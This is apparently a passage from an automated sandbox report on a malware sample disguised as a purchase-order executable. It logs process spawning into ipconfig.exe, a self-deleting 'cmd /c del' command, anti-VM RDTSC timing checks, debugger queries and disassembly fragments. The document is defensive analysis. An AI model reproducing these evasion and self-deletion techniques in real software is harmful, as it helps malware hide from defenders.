          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Purchase Order 40,7045$.exeVirustotal: Detection: 43%
          Source: Purchase Order 40,7045$.exeReversingLabs: Detection: 36%
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeFile read: C:\Users\user\Desktop\Purchase Order 40,7045$.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'Jump to behavior
          Source: Purchase Order 40,7045$.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: Purchase Order 40,7045$.exe, 00000001.00000002.273754242.0000000000B29000.00000004.00000020.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: Purchase Order 40,7045$.exe, 00000001.00000002.273754242.0000000000B29000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: Purchase Order 40,7045$.exe, 00000000.00000003.240059107.0000000003210000.00000004.00000001.sdmp, Purchase Order 40,7045$.exe, 00000001.00000002.274071356.000000000107F000.00000040.00000001.sdmp, ipconfig.exe, 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Purchase Order 40,7045$.exe, ipconfig.exe
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013D7FB0 LoadLibraryA,GetProcAddress,RpcMgmtEpEltInqBegin,VirtualProtect,EnumTimeFormatsA,__wsystem,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,0_2_013D7FB0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E0595 push ecx; ret 0_2_013E05A8
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013DD44F push ecx; ret 0_2_013DD462
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00415913 push edx; retf 1_2_00415915
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041AC62 push D8D19732h; iretd 1_2_0041AC69
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00414D57 push esi; retf 1_2_00414D58
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041AD65 push eax; ret 1_2_0041ADB8
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00414DEA push eax; ret 1_2_00414E32
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041ADB2 push eax; ret 1_2_0041ADB8
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041ADBB push eax; ret 1_2_0041AE22
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00414E7E push eax; ret 1_2_00414E32
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041AE1C push eax; ret 1_2_0041AE22
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00414E24 push eax; ret 1_2_00414E32
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0040FF92 push 00000033h; iretd 1_2_0040FF98
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FDD0D1 push ecx; ret 1_2_00FDD0E4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02ECD0D1 push ecx; ret 5_2_02ECD0E4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B15913 push edx; retf 5_2_02B15915
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B14E24 push eax; ret 5_2_02B14E32
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1AE1C push eax; ret 5_2_02B1AE22
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B14E7E push eax; ret 5_2_02B14E32
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B0FF92 push 00000033h; iretd 5_2_02B0FF98
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1AC62 push D8D19732h; iretd 5_2_02B1AC69
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1ADB2 push eax; ret 5_2_02B1ADB8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1ADBB push eax; ret 5_2_02B1AE22
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B14DEA push eax; ret 5_2_02B14E32
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1AD65 push eax; ret 5_2_02B1ADB8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B14D57 push esi; retf 5_2_02B14D58

          Persistence and Installation Behavior:

          barindex
          Uses ipconfig to lookup or modify the Windows network settingsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeRDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeRDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002B083D4 second address: 0000000002B083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002B0876E second address: 0000000002B08774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_004086A0 rdtsc 1_2_004086A0
          Source: C:\Windows\explorer.exe TID: 5636Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6160Thread sleep time: -48000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000002.00000000.251236949.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.259375031.0000000008C73000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000002.00000000.254456910.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.259579486.0000000008D97000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}October%%
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_004086A0 rdtsc 1_2_004086A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00409900 LdrLoadDll,1_2_00409900
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E032D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_013E032D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013D7FB0 LoadLibraryA,GetProcAddress,RpcMgmtEpEltInqBegin,VirtualProtect,EnumTimeFormatsA,__wsystem,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,0_2_013D7FB0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013FD014 mov eax, dword ptr fs:[00000030h]0_2_013FD014
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013FD051 mov eax, dword ptr fs:[00000030h]0_2_013FD051
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013FD0B4 mov eax, dword ptr fs:[00000030h]0_2_013FD0B4
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013FC520 mov eax, dword ptr fs:[00000030h]0_2_013FC520
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F858EC mov eax, dword ptr fs:[00000030h]1_2_00F858EC
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]1_2_00F840E1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]1_2_00F840E1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]1_2_00F840E1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBF0BF mov ecx, dword ptr fs:[00000030h]1_2_00FBF0BF
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h]1_2_00FBF0BF
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h]1_2_00FBF0BF
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC90AF mov eax, dword ptr fs:[00000030h]1_2_00FC90AF
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]1_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]1_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]1_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]1_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]1_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]1_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89080 mov eax, dword ptr fs:[00000030h]1_2_00F89080
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]1_2_010449A4
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]1_2_010449A4
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]1_2_010449A4
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]1_2_010449A4
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010069A6 mov eax, dword ptr fs:[00000030h]1_2_010069A6
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h]1_2_00FA0050
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h]1_2_00FA0050
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]1_2_010051BE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]1_2_010051BE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]1_2_010051BE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]1_2_010051BE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]1_2_00FAA830
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]1_2_00FAA830
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]1_2_00FAA830
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]1_2_00FAA830
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]1_2_00F9B02A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]1_2_00F9B02A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]1_2_00F9B02A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]1_2_00F9B02A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]1_2_00FB002D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]1_2_00FB002D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]1_2_00FB002D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]1_2_00FB002D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]1_2_00FB002D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010141E8 mov eax, dword ptr fs:[00000030h]1_2_010141E8
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01054015 mov eax, dword ptr fs:[00000030h]1_2_01054015
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01054015 mov eax, dword ptr fs:[00000030h]1_2_01054015
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]1_2_01007016
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]1_2_01007016
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]1_2_01007016
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]1_2_00F8B1E1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]1_2_00F8B1E1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]1_2_00F8B1E1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h]1_2_00FB61A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h]1_2_00FB61A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2990 mov eax, dword ptr fs:[00000030h]1_2_00FB2990
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01051074 mov eax, dword ptr fs:[00000030h]1_2_01051074
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01042073 mov eax, dword ptr fs:[00000030h]1_2_01042073
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAC182 mov eax, dword ptr fs:[00000030h]1_2_00FAC182
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBA185 mov eax, dword ptr fs:[00000030h]1_2_00FBA185
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01003884 mov eax, dword ptr fs:[00000030h]1_2_01003884
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01003884 mov eax, dword ptr fs:[00000030h]1_2_01003884
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h]1_2_00F8B171
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h]1_2_00F8B171
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8C962 mov eax, dword ptr fs:[00000030h]1_2_00F8C962
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h]1_2_00FAB944
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h]1_2_00FAB944
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe